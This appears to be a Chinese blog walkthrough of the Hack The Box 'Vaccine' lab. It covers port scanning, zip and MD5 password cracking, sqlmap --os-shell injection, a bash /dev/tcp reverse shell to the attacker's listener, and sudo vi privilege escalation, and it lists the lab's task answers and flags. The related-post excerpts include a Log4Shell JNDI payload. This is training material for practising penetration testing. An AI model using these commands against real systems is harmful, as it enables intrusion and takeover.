Hack the box Vaccine题解
在打靶机的时候网络有点问题,所以这份WP里的目标机器的IP前后是不一样的,但总的来说,方法大同小异
扫端口
1 | nmap -sC -sV 10.129.252.99 |
开启了21、22和80端口,访问80端口,什么都没有,结合任务1和任务2,就直接练上去看有没有东西
ftp
连上以后把文件复制出来
破解zip密码
解压的时候发现是有密码的
看到任务4,和经过百度知道利用zip2john去获取压缩包的hash值,然后使用john去破解hash值
破解成功
backup的内容
得到了两个文件
其中index.php里面有网站的管理员账号和密码,密码经过了md5加密,经过破解得到:qwerty789,这也是任务5的答案
sql注入
登录到后台后有个搜索框尝试有无sql注入,发现可注入,加上任务6的提示,那就直接sqlmap一把梭
用burpsuite抓包保存到1.txt后,利用sqlmap进行注入,并利用--os-shell进行执行shell的命令
- 注入命令:
1 | sqlmap -r 1.txt --os-shell |
反弹shell
- 攻击机监听
1 | nc -lvvp 1234 |
- 在
--os-shell里执行
1 | bash -c "bash -i >& /dev/tcp/10.10.14.13/1234 0>&1" |
在网站的根目录下的dashboard.php里发现了数据库的一个账号的密码
1 | 账号:postgres |
提权
在前面的端口扫描里看到这台机器是开启了22端口的,尝试使用上面得到的账号密码去登陆(想要用这个是因为为反弹shell后并不稳定,老是掉线,所以就换另一个方法),可以成功登录
使用命令suo -l查看postgres能执行的高级权限的命令
发现有一个命令是:
1 | (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf |
然后看官方的wp得知,可以利用vi进行提权
首先运行命令:sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
输入:切换命令模式输入:set shell=/bin/sh在按一次
:切换到命令模式输入:shell
然后就切换到了root用户
答案
- FTP
- anonymous
- backup.zip
- zip2john
- qwerty789
- –os-shell
- vi
- ec9b13ca4d6229cd5cc1e09980965bf7
- dd6e058e814260bc70e9bbdef2715849
参考博客
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Crzliang!
相关推荐
2023-03-23
Hack the box Oopsie题解
扫机器拿到目标机器的IP,先看一下,开放了什么端口 1nmap -sC -sV...
2023-04-03
Hack the box Unified题解
打这个靶机的时候也是断断续续的,所以里面的目标IP前后对应不上,但是方法都是一样的。 扫端口1nmap -sC -sV 10.129.96.149 访问8080端口重定向到了8443 看到是unifi6.4.54版本的,结合官方给的WP知道这个版本有一个CVE,可以以此为出发点进行攻击 CVE-2021-44228的利用验证漏洞存在先验证是不是存在这个漏洞 抓包,因为是https的站,所以要对burpsuite进行一些设置Burp Suite抓HTTPS数据包教程 然后根据官方的WP,需要把remember的值改成${jndi:ldap://Tun 0的IP/o=tomcat} 验证存在 实施攻击漏洞利用环境搭建 更新&&安装环境 sudo apt update sudo apt install openjdk-11-jdk -y sudo apt-get install maven 安装工具 git clone https://github.com/veracode-research/rogue-jndi cd...
2022-06-05
DC-1复现
DC-1复现描述 DC-1 是一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 它旨在为初学者带来挑战,但它的简单程度取决于您的技能和知识以及您的学习能力。 要成功完成这一挑战,您将需要 Linux 技能、熟悉 Linux 命令行以及使用基本渗透测试工具的经验,例如可以在 Kali Linux 或 Parrot Security OS 上找到的工具。 有多种获得 root 的方法,但是,我已经包含了一些包含初学者线索的标志。 总共有五个标志,但最终目标是在 root 的主目录中找到并读取标志。您甚至不需要成为 root 即可执行此操作,但是,您将需要 root 权限。 根据您的技能水平,您可能可以跳过查找大多数这些标志并直接获取根。 初学者可能会遇到他们以前从未遇到过的挑战,但谷歌搜索应该是获取完成这一挑战所需信息的全部内容。 开始1.利用nmap收集有用信息 确定DC-1的ip为192.168.207.136 使用命令 nmap -sT...
2022-06-05
DC-4复现
DC-4复现描述 DC-4 是另一个特意建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 与之前的 DC 版本不同,这个版本主要是为初学者/中级者设计的。只有一个标志,但从技术上讲,有多个入口点,就像上次一样,没有线索。 必须具备 Linux 技能和熟悉 Linux 命令行,以及一些基本渗透测试工具的经验。 对于初学者来说,谷歌可以提供很大的帮助,但你可以随时在@DCAU7...
2022-06-05
DC-3复现
DC-3复现描述 DC-3 是另一个特意建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 与之前的 DC 版本一样,这个版本是为初学者设计的,虽然这一次,只有一个标志,一个入口点,根本没有任何线索。 必须具备 Linux 技能和熟悉 Linux 命令行,以及一些基本渗透测试工具的经验。 对于初学者来说,谷歌可以提供很大的帮助,但你可以随时在@DCAU7 上给我发推文,寻求帮助,让你重新开始。但请注意:我不会给你答案,相反,我会给你一个关于如何前进的想法。 对于那些有 CTF 和 Boot2Root 挑战经验的人来说,这可能不会花你很长时间(事实上,它可能会花费你不到 20 分钟的时间)。 如果是这种情况,并且如果您希望它更具挑战性,您可以随时重做挑战并探索其他获得根和获得旗帜的方法。 开始信息收集 扫描C段看找到目标机器的ip 然后看都开了哪些端口,扫到了80端口 直接访问ip看到这个网站用的是joomla的框架,那我们可以尝试利用joomscan工具获取更加详细的信息 因为kali并没有集成该工具,所以需要下载 安装命令apt install...
2022-06-05
DC-2复现
DC-2复现描述 与 DC-1 非常相似,DC-2 是另一个专门构建的易受攻击的实验室,目的是获得渗透测试领域的经验。 与最初的 DC-1 一样,它的设计考虑到了初学者。 必须具备 Linux 技能和熟悉 Linux 命令行,以及一些基本渗透测试工具的经验。 就像 DC-1 一样,有五个标志,包括最终标志。 再说一次,就像 DC-1 一样,标志对初学者很重要,但对有经验的人来说并不那么重要。 简而言之,唯一真正重要的标志是最终标志。 对于初学者来说,谷歌是你的朋友。好吧,除了所有的隐私问题等等等等。 我还没有探索实现 root...
评论